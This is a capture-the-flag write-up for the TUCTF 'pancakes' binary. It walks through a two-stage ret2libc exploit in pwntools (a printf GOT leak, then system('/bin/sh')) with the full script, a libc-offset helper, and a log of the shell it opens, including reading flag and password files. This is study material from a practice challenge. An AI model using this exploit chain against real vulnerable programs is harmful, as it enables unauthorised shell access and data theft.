### Given a binary with the detail below
```
chao at Yu in [~/Documents/WriteUps/TUCTF/pwn/pancakes] on git:master ✗ 7e4a166 "Added so many new pwn"
17:17:35 › file pancakes && checksec pancakes
pancakes: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=a653a608db5ab4716ca7b1e891ee3b460e097eb8, for GNU/Linux 3.2.0, not stripped
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/pancakes/pancakes'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
```

The first thing that comes to mind is **ret2libc** to get a shell. So I immediately tried to leak libc: overwrite the return address with **printf@plt**, set its argument to the **GOT address** of printf, and set the next return address to **main**, so it prints the libc address stored in that **GOT entry** and returns back to **main**.

```
from pwn import *
import sys


def exploit(p, libc, libc_diff):
    binary = ELF("pancakes")
    main = binary.symbols['main']
    printf_plt = binary.plt['printf']
    printf_got = binary.got['printf']
    padding = 44  # bytes from the start of the buffer to the saved return address

    # Stage 1: return into printf@plt with printf@got as its argument, then
    # return to main so a second payload can be sent after the leak.
    payload = b''
    payload += b'A' * padding
    payload += p32(printf_plt)  # overwritten return address
    payload += p32(main)        # printf's return address: run main again
    payload += p32(printf_got)  # printf's first argument: the GOT entry of printf

    p.sendline(payload)
```
After leaking the libc address, we calculate the base address and overwrite the return address with **system**, passing the address of **/bin/sh** as its argument, so the program executes **system("/bin/sh")**.

```
    # Stage 2 (continuation of exploit()): read the leak and build the final chain.
    p.recvuntil(b"Try harder\n")

    libc_leak = u32(p.recv(4))  # printf wrote the GOT entry's bytes verbatim
    log.info("Libc leak : {}".format(hex(libc_leak)))
    libc.address = libc_leak - libc_diff  # libc_diff = offset of printf inside libc
    log.info("Libc base address : {}".format(hex(libc.address)))
    libc_system = libc.symbols['system']
    log.info("Libc system : {}".format(hex(libc_system)))
    libc_binsh = next(libc.search(b"/bin/sh"))
    log.info("Libc /bin/sh : {}".format(hex(libc_binsh)))

    payload = b''
    payload += b'A' * padding
    payload += p32(libc_system)  # overwritten return address
    payload += b"JUNK"           # system's return address, never used
    payload += p32(libc_binsh)   # system's first argument

    p.sendline(payload)
    sleep(1)
    p.sendline(b"ls -la && cat f* && cat pass*")
    p.interactive()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        log.info("Argument needed!")
        log.info("Usage: python {} <local/remote>".format(sys.argv[0]))
        sys.exit(0)
    elif sys.argv[1] == "local":
        p = process("./pancakes")
        libc = ELF("libc6_2.27-3ubuntu1_i386.so")
        exploit(p, libc, 0x0512d0)
    elif sys.argv[1] == "remote":
        p = remote("chal.tuctf.com", 30503)
        libc = ELF("libc6_2.27-3ubuntu1_i386.so")
        exploit(p, libc, 0x0512d0)
    else:
        sys.exit(0)
```
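As an added example (not part of the original writeup), the arithmetic behind `libc_diff` and the base calculation, using only the standard library: `libc_diff` is printf's offset inside the libc build the target actually uses (what `libc.symbols['printf']` returns for libc6_2.27-3ubuntu1_i386.so, 0x512d0 in the run above), the leak minus that offset must land on a page boundary, and every other address is base plus the symbol's offset. The `system` and `/bin/sh` offsets below are back-computed from the logged addresses, and the length check covers the case where printf stops early because the leaked address contains a NUL byte.

```python
import struct

PAGE = 0x1000


def parse_leak(raw: bytes) -> int:
    """Decode the 4 little-endian bytes printf emitted from the GOT entry.
    printf stops at the first NUL byte, so an address containing 0x00 arrives
    truncated; refuse to guess rather than compute a wrong base."""
    if len(raw) < 4:
        raise ValueError("leak truncated (does the address contain a NUL byte?)")
    return struct.unpack("<I", raw[:4])[0]  # same as pwntools u32()


def libc_base(leak: int, symbol_offset: int) -> int:
    """leak - libc_diff, where libc_diff is the leaked symbol's offset inside
    the libc build the target uses (ELF(libc).symbols['printf'])."""
    base = leak - symbol_offset
    # A libc mapping always starts on a page boundary; anything else means the
    # offset came from a different libc build than the one in the target.
    if base & (PAGE - 1):
        raise ValueError(f"base {base:#x} is not page aligned: wrong libc or offset")
    return base


def resolve(base: int, offsets: dict) -> dict:
    """Rebase every symbol offset onto the leaked libc base."""
    return {name: base + off for name, off in offsets.items()}


# Values from the run logged above (libc6_2.27-3ubuntu1_i386.so):
PRINTF_OFF = 0x0512d0            # the writeup's libc_diff
RAW_LEAK = b"\xd0\xc2\xd7\xf7"   # constructed: 0xf7d7c2d0 as printf emitted it
# system and "/bin/sh" offsets back-computed from the logged addresses
OFFSETS = {"system": 0x3d200, "binsh": 0x17e0cf}

if __name__ == "__main__":
    base = libc_base(parse_leak(RAW_LEAK), PRINTF_OFF)
    print(f"base={base:#x}", {k: hex(v) for k, v in resolve(base, OFFSETS).items()})
```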

Running the exploit gives us a shell:
```
chao at Yu in [~/Documents/WriteUps/TUCTF/pwn/pancakes] on git:master ✗ 7e4a166 "Added so many new pwn"
17:17:44 › python exploit.py local
[+] Starting local process './pancakes': pid 6398
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/pancakes/libc6_2.27-3ubuntu1_i386.so'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/pancakes/pancakes'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] Libc leak : 0xf7d7c2d0
[*] Libc base address : 0xf7d2b000
[*] Libc system : 0xf7d68200
[*] Libc /bin/sh : 0xf7ea90cf
[*] Switching to interactive mode
�!��@+��0\x17���=��\xb02��0\xb7���&��Enter pancake password
> Try harder
total 1940
drwxrwxr-x 2 chao chao 4096 Des 2 01:46 .
drwxrwxr-x 9 chao chao 4096 Des 2 01:46 ..
-rw-rw-r-- 1 chao chao 1564 Des 2 01:43 exploit.py
-rw-r--r-- 1 chao chao 18 Des 2 00:57 flag.txt
-rw------- 1 chao chao 200 Des 2 01:32 .gdb_history
-rw-rw-r-- 1 chao chao 1942840 Nov 30 21:49 libc6_2.27-3ubuntu1_i386.so
-rwxrwxr-x 1 chao chao 15696 Des 2 00:54 pancakes
-rw-r--r-- 1 chao chao 5 Des 2 00:59 password.txt
flag{test_chall}
AAAA
$ id
uid=1000(chao) gid=1000(chao) groups=1000(chao),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),999(docker)
```

Original writeup (https://github.com/ChaO-0/WriteUps/blob/master/TUCTF/pwn/pancakes/exploit.py).
omaroobaniessa, Dec. 10, 2019, 10:34 a.m.

Can you explain how you got libc_diff?